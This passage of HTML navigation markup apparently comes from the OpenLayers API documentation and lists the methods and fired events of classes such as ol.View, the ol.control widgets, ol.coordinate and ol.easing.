<li data-name="ol.View#getZoom" class="">
<a href="ol.View.html#getZoom">getZoom</a>
</li>
<li data-name="ol.View#on" class="">
<a href="ol.View.html#on">on</a>
</li>
<li data-name="ol.View#once" class="">
<a href="ol.View.html#once">once</a>
</li>
<li data-name="ol.View#rotate" class="">
<a href="ol.View.html#rotate">rotate</a>
</li>
<li data-name="ol.View#set" class="">
<a href="ol.View.html#set">set</a>
</li>
<li data-name="ol.View#setCenter" class="">
<a href="ol.View.html#setCenter">setCenter</a>
</li>
<li data-name="ol.View#setProperties" class="">
<a href="ol.View.html#setProperties">setProperties</a>
</li>
<li data-name="ol.View#setResolution" class="">
<a href="ol.View.html#setResolution">setResolution</a>
</li>
<li data-name="ol.View#setRotation" class="">
<a href="ol.View.html#setRotation">setRotation</a>
</li>
<li data-name="ol.View#setZoom" class="">
<a href="ol.View.html#setZoom">setZoom</a>
</li>
<li data-name="ol.View#un" class="">
<a href="ol.View.html#un">un</a>
</li>
<li data-name="ol.View#unByKey" class="">
<a href="ol.View.html#unByKey">unByKey</a>
</li>
<li data-name="ol.View#unset" class="">
<a href="ol.View.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:center" class="unstable">
change:center
</li>
<li data-name="ol.ObjectEvent#event:change:resolution" class="unstable">
change:resolution
</li>
<li data-name="ol.ObjectEvent#event:change:rotation" class="unstable">
change:rotation
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.animation">
<span class="title">
<a href="ol.animation.html">ol.animation</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.animation.bounce" class="unstable">
<a href="ol.animation.html#bounce">bounce</a>
</li>
<li data-name="ol.animation.pan" class="unstable">
<a href="ol.animation.html#pan">pan</a>
</li>
<li data-name="ol.animation.rotate" class="unstable">
<a href="ol.animation.html#rotate">rotate</a>
</li>
<li data-name="ol.animation.zoom" class="unstable">
<a href="ol.animation.html#zoom">zoom</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.color">
<span class="title">
<a href="ol.color.html">ol.color</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.color.asArray" class="unstable">
<a href="ol.color.html#asArray">asArray</a>
</li>
<li data-name="ol.color.asString" class="unstable">
<a href="ol.color.html#asString">asString</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.control">
<span class="title">
<a href="ol.control.html">ol.control</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.control.ScaleLineUnits" class="">
<a href="ol.control.html#ScaleLineUnits">ScaleLineUnits</a>
</li>
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.defaults" class="">
<a href="ol.control.html#defaults">defaults</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.control.Attribution">
<span class="title">
<a href="ol.control.Attribution.html">ol.control.Attribution</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.Attribution.render" class="unstable">
<a href="ol.control.Attribution.html#render">render</a>
</li>
<li data-name="ol.control.Attribution#changed" class="unstable">
<a href="ol.control.Attribution.html#changed">changed</a>
</li>
<li data-name="ol.control.Attribution#get" class="">
<a href="ol.control.Attribution.html#get">get</a>
</li>
<li data-name="ol.control.Attribution#getCollapsed" class="">
<a href="ol.control.Attribution.html#getCollapsed">getCollapsed</a>
</li>
<li data-name="ol.control.Attribution#getCollapsible" class="">
<a href="ol.control.Attribution.html#getCollapsible">getCollapsible</a>
</li>
<li data-name="ol.control.Attribution#getKeys" class="">
<a href="ol.control.Attribution.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.Attribution#getMap" class="">
<a href="ol.control.Attribution.html#getMap">getMap</a>
</li>
<li data-name="ol.control.Attribution#getProperties" class="">
<a href="ol.control.Attribution.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.Attribution#getRevision" class="unstable">
<a href="ol.control.Attribution.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.Attribution#on" class="">
<a href="ol.control.Attribution.html#on">on</a>
</li>
<li data-name="ol.control.Attribution#once" class="">
<a href="ol.control.Attribution.html#once">once</a>
</li>
<li data-name="ol.control.Attribution#set" class="">
<a href="ol.control.Attribution.html#set">set</a>
</li>
<li data-name="ol.control.Attribution#setCollapsed" class="">
<a href="ol.control.Attribution.html#setCollapsed">setCollapsed</a>
</li>
<li data-name="ol.control.Attribution#setCollapsible" class="">
<a href="ol.control.Attribution.html#setCollapsible">setCollapsible</a>
</li>
<li data-name="ol.control.Attribution#setMap" class="">
<a href="ol.control.Attribution.html#setMap">setMap</a>
</li>
<li data-name="ol.control.Attribution#setProperties" class="">
<a href="ol.control.Attribution.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.Attribution#setTarget" class="unstable">
<a href="ol.control.Attribution.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.Attribution#un" class="">
<a href="ol.control.Attribution.html#un">un</a>
</li>
<li data-name="ol.control.Attribution#unByKey" class="">
<a href="ol.control.Attribution.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.Attribution#unset" class="">
<a href="ol.control.Attribution.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.Control">
<span class="title">
<a href="ol.control.Control.html">ol.control.Control</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.Control#changed" class="unstable">
<a href="ol.control.Control.html#changed">changed</a>
</li>
<li data-name="ol.control.Control#get" class="">
<a href="ol.control.Control.html#get">get</a>
</li>
<li data-name="ol.control.Control#getKeys" class="">
<a href="ol.control.Control.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.Control#getMap" class="">
<a href="ol.control.Control.html#getMap">getMap</a>
</li>
<li data-name="ol.control.Control#getProperties" class="">
<a href="ol.control.Control.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.Control#getRevision" class="unstable">
<a href="ol.control.Control.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.Control#on" class="">
<a href="ol.control.Control.html#on">on</a>
</li>
<li data-name="ol.control.Control#once" class="">
<a href="ol.control.Control.html#once">once</a>
</li>
<li data-name="ol.control.Control#set" class="">
<a href="ol.control.Control.html#set">set</a>
</li>
<li data-name="ol.control.Control#setMap" class="">
<a href="ol.control.Control.html#setMap">setMap</a>
</li>
<li data-name="ol.control.Control#setProperties" class="">
<a href="ol.control.Control.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.Control#setTarget" class="unstable">
<a href="ol.control.Control.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.Control#un" class="">
<a href="ol.control.Control.html#un">un</a>
</li>
<li data-name="ol.control.Control#unByKey" class="">
<a href="ol.control.Control.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.Control#unset" class="">
<a href="ol.control.Control.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.FullScreen">
<span class="title">
<a href="ol.control.FullScreen.html">ol.control.FullScreen</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.FullScreen#changed" class="unstable">
<a href="ol.control.FullScreen.html#changed">changed</a>
</li>
<li data-name="ol.control.FullScreen#get" class="">
<a href="ol.control.FullScreen.html#get">get</a>
</li>
<li data-name="ol.control.FullScreen#getKeys" class="">
<a href="ol.control.FullScreen.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.FullScreen#getMap" class="">
<a href="ol.control.FullScreen.html#getMap">getMap</a>
</li>
<li data-name="ol.control.FullScreen#getProperties" class="">
<a href="ol.control.FullScreen.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.FullScreen#getRevision" class="unstable">
<a href="ol.control.FullScreen.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.FullScreen#on" class="">
<a href="ol.control.FullScreen.html#on">on</a>
</li>
<li data-name="ol.control.FullScreen#once" class="">
<a href="ol.control.FullScreen.html#once">once</a>
</li>
<li data-name="ol.control.FullScreen#set" class="">
<a href="ol.control.FullScreen.html#set">set</a>
</li>
<li data-name="ol.control.FullScreen#setMap" class="">
<a href="ol.control.FullScreen.html#setMap">setMap</a>
</li>
<li data-name="ol.control.FullScreen#setProperties" class="">
<a href="ol.control.FullScreen.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.FullScreen#setTarget" class="unstable">
<a href="ol.control.FullScreen.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.FullScreen#un" class="">
<a href="ol.control.FullScreen.html#un">un</a>
</li>
<li data-name="ol.control.FullScreen#unByKey" class="">
<a href="ol.control.FullScreen.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.FullScreen#unset" class="">
<a href="ol.control.FullScreen.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.MousePosition">
<span class="title">
<a href="ol.control.MousePosition.html">ol.control.MousePosition</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.MousePosition.render" class="unstable">
<a href="ol.control.MousePosition.html#render">render</a>
</li>
<li data-name="ol.control.MousePosition#changed" class="unstable">
<a href="ol.control.MousePosition.html#changed">changed</a>
</li>
<li data-name="ol.control.MousePosition#get" class="">
<a href="ol.control.MousePosition.html#get">get</a>
</li>
<li data-name="ol.control.MousePosition#getCoordinateFormat" class="">
<a href="ol.control.MousePosition.html#getCoordinateFormat">getCoordinateFormat</a>
</li>
<li data-name="ol.control.MousePosition#getKeys" class="">
<a href="ol.control.MousePosition.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.MousePosition#getMap" class="">
<a href="ol.control.MousePosition.html#getMap">getMap</a>
</li>
<li data-name="ol.control.MousePosition#getProjection" class="">
<a href="ol.control.MousePosition.html#getProjection">getProjection</a>
</li>
<li data-name="ol.control.MousePosition#getProperties" class="">
<a href="ol.control.MousePosition.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.MousePosition#getRevision" class="unstable">
<a href="ol.control.MousePosition.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.MousePosition#on" class="">
<a href="ol.control.MousePosition.html#on">on</a>
</li>
<li data-name="ol.control.MousePosition#once" class="">
<a href="ol.control.MousePosition.html#once">once</a>
</li>
<li data-name="ol.control.MousePosition#set" class="">
<a href="ol.control.MousePosition.html#set">set</a>
</li>
<li data-name="ol.control.MousePosition#setCoordinateFormat" class="">
<a href="ol.control.MousePosition.html#setCoordinateFormat">setCoordinateFormat</a>
</li>
<li data-name="ol.control.MousePosition#setMap" class="">
<a href="ol.control.MousePosition.html#setMap">setMap</a>
</li>
<li data-name="ol.control.MousePosition#setProjection" class="">
<a href="ol.control.MousePosition.html#setProjection">setProjection</a>
</li>
<li data-name="ol.control.MousePosition#setProperties" class="">
<a href="ol.control.MousePosition.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.MousePosition#setTarget" class="unstable">
<a href="ol.control.MousePosition.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.MousePosition#un" class="">
<a href="ol.control.MousePosition.html#un">un</a>
</li>
<li data-name="ol.control.MousePosition#unByKey" class="">
<a href="ol.control.MousePosition.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.MousePosition#unset" class="">
<a href="ol.control.MousePosition.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:coordinateFormat" class="unstable">
change:coordinateFormat
</li>
<li data-name="ol.ObjectEvent#event:change:projection" class="unstable">
change:projection
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.OverviewMap">
<span class="title">
<a href="ol.control.OverviewMap.html">ol.control.OverviewMap</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.OverviewMap.render" class="unstable">
<a href="ol.control.OverviewMap.html#render">render</a>
</li>
<li data-name="ol.control.OverviewMap#changed" class="unstable">
<a href="ol.control.OverviewMap.html#changed">changed</a>
</li>
<li data-name="ol.control.OverviewMap#get" class="">
<a href="ol.control.OverviewMap.html#get">get</a>
</li>
<li data-name="ol.control.OverviewMap#getCollapsed" class="">
<a href="ol.control.OverviewMap.html#getCollapsed">getCollapsed</a>
</li>
<li data-name="ol.control.OverviewMap#getCollapsible" class="">
<a href="ol.control.OverviewMap.html#getCollapsible">getCollapsible</a>
</li>
<li data-name="ol.control.OverviewMap#getKeys" class="">
<a href="ol.control.OverviewMap.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.OverviewMap#getMap" class="">
<a href="ol.control.OverviewMap.html#getMap">getMap</a>
</li>
<li data-name="ol.control.OverviewMap#getProperties" class="">
<a href="ol.control.OverviewMap.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.OverviewMap#getRevision" class="unstable">
<a href="ol.control.OverviewMap.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.OverviewMap#on" class="">
<a href="ol.control.OverviewMap.html#on">on</a>
</li>
<li data-name="ol.control.OverviewMap#once" class="">
<a href="ol.control.OverviewMap.html#once">once</a>
</li>
<li data-name="ol.control.OverviewMap#set" class="">
<a href="ol.control.OverviewMap.html#set">set</a>
</li>
<li data-name="ol.control.OverviewMap#setCollapsed" class="">
<a href="ol.control.OverviewMap.html#setCollapsed">setCollapsed</a>
</li>
<li data-name="ol.control.OverviewMap#setCollapsible" class="">
<a href="ol.control.OverviewMap.html#setCollapsible">setCollapsible</a>
</li>
<li data-name="ol.control.OverviewMap#setMap" class="">
<a href="ol.control.OverviewMap.html#setMap">setMap</a>
</li>
<li data-name="ol.control.OverviewMap#setProperties" class="">
<a href="ol.control.OverviewMap.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.OverviewMap#setTarget" class="unstable">
<a href="ol.control.OverviewMap.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.OverviewMap#un" class="">
<a href="ol.control.OverviewMap.html#un">un</a>
</li>
<li data-name="ol.control.OverviewMap#unByKey" class="">
<a href="ol.control.OverviewMap.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.OverviewMap#unset" class="">
<a href="ol.control.OverviewMap.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.Rotate">
<span class="title">
<a href="ol.control.Rotate.html">ol.control.Rotate</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.Rotate.render" class="unstable">
<a href="ol.control.Rotate.html#render">render</a>
</li>
<li data-name="ol.control.Rotate#changed" class="unstable">
<a href="ol.control.Rotate.html#changed">changed</a>
</li>
<li data-name="ol.control.Rotate#get" class="">
<a href="ol.control.Rotate.html#get">get</a>
</li>
<li data-name="ol.control.Rotate#getKeys" class="">
<a href="ol.control.Rotate.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.Rotate#getMap" class="">
<a href="ol.control.Rotate.html#getMap">getMap</a>
</li>
<li data-name="ol.control.Rotate#getProperties" class="">
<a href="ol.control.Rotate.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.Rotate#getRevision" class="unstable">
<a href="ol.control.Rotate.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.Rotate#on" class="">
<a href="ol.control.Rotate.html#on">on</a>
</li>
<li data-name="ol.control.Rotate#once" class="">
<a href="ol.control.Rotate.html#once">once</a>
</li>
<li data-name="ol.control.Rotate#set" class="">
<a href="ol.control.Rotate.html#set">set</a>
</li>
<li data-name="ol.control.Rotate#setMap" class="">
<a href="ol.control.Rotate.html#setMap">setMap</a>
</li>
<li data-name="ol.control.Rotate#setProperties" class="">
<a href="ol.control.Rotate.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.Rotate#setTarget" class="unstable">
<a href="ol.control.Rotate.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.Rotate#un" class="">
<a href="ol.control.Rotate.html#un">un</a>
</li>
<li data-name="ol.control.Rotate#unByKey" class="">
<a href="ol.control.Rotate.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.Rotate#unset" class="">
<a href="ol.control.Rotate.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.ScaleLine">
<span class="title">
<a href="ol.control.ScaleLine.html">ol.control.ScaleLine</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.ScaleLine.render" class="unstable">
<a href="ol.control.ScaleLine.html#render">render</a>
</li>
<li data-name="ol.control.ScaleLine#changed" class="unstable">
<a href="ol.control.ScaleLine.html#changed">changed</a>
</li>
<li data-name="ol.control.ScaleLine#get" class="">
<a href="ol.control.ScaleLine.html#get">get</a>
</li>
<li data-name="ol.control.ScaleLine#getKeys" class="">
<a href="ol.control.ScaleLine.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.ScaleLine#getMap" class="">
<a href="ol.control.ScaleLine.html#getMap">getMap</a>
</li>
<li data-name="ol.control.ScaleLine#getProperties" class="">
<a href="ol.control.ScaleLine.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.ScaleLine#getRevision" class="unstable">
<a href="ol.control.ScaleLine.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.ScaleLine#getUnits" class="">
<a href="ol.control.ScaleLine.html#getUnits">getUnits</a>
</li>
<li data-name="ol.control.ScaleLine#on" class="">
<a href="ol.control.ScaleLine.html#on">on</a>
</li>
<li data-name="ol.control.ScaleLine#once" class="">
<a href="ol.control.ScaleLine.html#once">once</a>
</li>
<li data-name="ol.control.ScaleLine#set" class="">
<a href="ol.control.ScaleLine.html#set">set</a>
</li>
<li data-name="ol.control.ScaleLine#setMap" class="">
<a href="ol.control.ScaleLine.html#setMap">setMap</a>
</li>
<li data-name="ol.control.ScaleLine#setProperties" class="">
<a href="ol.control.ScaleLine.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.ScaleLine#setTarget" class="unstable">
<a href="ol.control.ScaleLine.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.ScaleLine#setUnits" class="">
<a href="ol.control.ScaleLine.html#setUnits">setUnits</a>
</li>
<li data-name="ol.control.ScaleLine#un" class="">
<a href="ol.control.ScaleLine.html#un">un</a>
</li>
<li data-name="ol.control.ScaleLine#unByKey" class="">
<a href="ol.control.ScaleLine.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.ScaleLine#unset" class="">
<a href="ol.control.ScaleLine.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:change:units" class="unstable">
change:units
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.Zoom">
<span class="title">
<a href="ol.control.Zoom.html">ol.control.Zoom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.Zoom#changed" class="unstable">
<a href="ol.control.Zoom.html#changed">changed</a>
</li>
<li data-name="ol.control.Zoom#get" class="">
<a href="ol.control.Zoom.html#get">get</a>
</li>
<li data-name="ol.control.Zoom#getKeys" class="">
<a href="ol.control.Zoom.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.Zoom#getMap" class="">
<a href="ol.control.Zoom.html#getMap">getMap</a>
</li>
<li data-name="ol.control.Zoom#getProperties" class="">
<a href="ol.control.Zoom.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.Zoom#getRevision" class="unstable">
<a href="ol.control.Zoom.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.Zoom#on" class="">
<a href="ol.control.Zoom.html#on">on</a>
</li>
<li data-name="ol.control.Zoom#once" class="">
<a href="ol.control.Zoom.html#once">once</a>
</li>
<li data-name="ol.control.Zoom#set" class="">
<a href="ol.control.Zoom.html#set">set</a>
</li>
<li data-name="ol.control.Zoom#setMap" class="">
<a href="ol.control.Zoom.html#setMap">setMap</a>
</li>
<li data-name="ol.control.Zoom#setProperties" class="">
<a href="ol.control.Zoom.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.Zoom#setTarget" class="unstable">
<a href="ol.control.Zoom.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.Zoom#un" class="">
<a href="ol.control.Zoom.html#un">un</a>
</li>
<li data-name="ol.control.Zoom#unByKey" class="">
<a href="ol.control.Zoom.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.Zoom#unset" class="">
<a href="ol.control.Zoom.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.ZoomSlider">
<span class="title">
<a href="ol.control.ZoomSlider.html">ol.control.ZoomSlider</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.ZoomSlider.render" class="unstable">
<a href="ol.control.ZoomSlider.html#render">render</a>
</li>
<li data-name="ol.control.ZoomSlider#changed" class="unstable">
<a href="ol.control.ZoomSlider.html#changed">changed</a>
</li>
<li data-name="ol.control.ZoomSlider#get" class="">
<a href="ol.control.ZoomSlider.html#get">get</a>
</li>
<li data-name="ol.control.ZoomSlider#getKeys" class="">
<a href="ol.control.ZoomSlider.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.ZoomSlider#getMap" class="">
<a href="ol.control.ZoomSlider.html#getMap">getMap</a>
</li>
<li data-name="ol.control.ZoomSlider#getProperties" class="">
<a href="ol.control.ZoomSlider.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.ZoomSlider#getRevision" class="unstable">
<a href="ol.control.ZoomSlider.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.ZoomSlider#on" class="">
<a href="ol.control.ZoomSlider.html#on">on</a>
</li>
<li data-name="ol.control.ZoomSlider#once" class="">
<a href="ol.control.ZoomSlider.html#once">once</a>
</li>
<li data-name="ol.control.ZoomSlider#set" class="">
<a href="ol.control.ZoomSlider.html#set">set</a>
</li>
<li data-name="ol.control.ZoomSlider#setMap" class="">
<a href="ol.control.ZoomSlider.html#setMap">setMap</a>
</li>
<li data-name="ol.control.ZoomSlider#setProperties" class="">
<a href="ol.control.ZoomSlider.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.ZoomSlider#setTarget" class="unstable">
<a href="ol.control.ZoomSlider.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.ZoomSlider#un" class="">
<a href="ol.control.ZoomSlider.html#un">un</a>
</li>
<li data-name="ol.control.ZoomSlider#unByKey" class="">
<a href="ol.control.ZoomSlider.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.ZoomSlider#unset" class="">
<a href="ol.control.ZoomSlider.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.control.ZoomToExtent">
<span class="title">
<a href="ol.control.ZoomToExtent.html">ol.control.ZoomToExtent</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.control.ZoomToExtent#changed" class="unstable">
<a href="ol.control.ZoomToExtent.html#changed">changed</a>
</li>
<li data-name="ol.control.ZoomToExtent#get" class="">
<a href="ol.control.ZoomToExtent.html#get">get</a>
</li>
<li data-name="ol.control.ZoomToExtent#getKeys" class="">
<a href="ol.control.ZoomToExtent.html#getKeys">getKeys</a>
</li>
<li data-name="ol.control.ZoomToExtent#getMap" class="">
<a href="ol.control.ZoomToExtent.html#getMap">getMap</a>
</li>
<li data-name="ol.control.ZoomToExtent#getProperties" class="">
<a href="ol.control.ZoomToExtent.html#getProperties">getProperties</a>
</li>
<li data-name="ol.control.ZoomToExtent#getRevision" class="unstable">
<a href="ol.control.ZoomToExtent.html#getRevision">getRevision</a>
</li>
<li data-name="ol.control.ZoomToExtent#on" class="">
<a href="ol.control.ZoomToExtent.html#on">on</a>
</li>
<li data-name="ol.control.ZoomToExtent#once" class="">
<a href="ol.control.ZoomToExtent.html#once">once</a>
</li>
<li data-name="ol.control.ZoomToExtent#set" class="">
<a href="ol.control.ZoomToExtent.html#set">set</a>
</li>
<li data-name="ol.control.ZoomToExtent#setMap" class="">
<a href="ol.control.ZoomToExtent.html#setMap">setMap</a>
</li>
<li data-name="ol.control.ZoomToExtent#setProperties" class="">
<a href="ol.control.ZoomToExtent.html#setProperties">setProperties</a>
</li>
<li data-name="ol.control.ZoomToExtent#setTarget" class="unstable">
<a href="ol.control.ZoomToExtent.html#setTarget">setTarget</a>
</li>
<li data-name="ol.control.ZoomToExtent#un" class="">
<a href="ol.control.ZoomToExtent.html#un">un</a>
</li>
<li data-name="ol.control.ZoomToExtent#unByKey" class="">
<a href="ol.control.ZoomToExtent.html#unByKey">unByKey</a>
</li>
<li data-name="ol.control.ZoomToExtent#unset" class="">
<a href="ol.control.ZoomToExtent.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.coordinate">
<span class="title">
<a href="ol.coordinate.html">ol.coordinate</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.coordinate.add" class="">
<a href="ol.coordinate.html#add">add</a>
</li>
<li data-name="ol.coordinate.createStringXY" class="">
<a href="ol.coordinate.html#createStringXY">createStringXY</a>
</li>
<li data-name="ol.coordinate.format" class="">
<a href="ol.coordinate.html#format">format</a>
</li>
<li data-name="ol.coordinate.rotate" class="">
<a href="ol.coordinate.html#rotate">rotate</a>
</li>
<li data-name="ol.coordinate.toStringHDMS" class="">
<a href="ol.coordinate.html#toStringHDMS">toStringHDMS</a>
</li>
<li data-name="ol.coordinate.toStringXY" class="">
<a href="ol.coordinate.html#toStringXY">toStringXY</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.easing">
<span class="title">
<a href="ol.easing.html">ol.easing</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.easing.easeIn" class="unstable">
<a href="ol.easing.html#easeIn">easeIn</a>
</li>
<li data-name="ol.easing.easeOut" class="unstable">
<a href="ol.easing.html#easeOut">easeOut</a>
</li>
<li data-name="ol.easing.inAndOut" class="unstable">
<a href="ol.easing.html#inAndOut">inAndOut</a>
</li>
<li data-name="ol.easing.linear" class="unstable">
<a href="ol.easing.html#linear">linear</a>
</li>
<li data-name="ol.easing.upAndDown" class="unstable">
<a href="ol.easing.html#upAndDown">upAndDown</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.events">
<span class="title">
<a href="ol.events.html">ol.events</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.events.ConditionType" class="">
<a href="ol.events.html#ConditionType">ConditionType</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
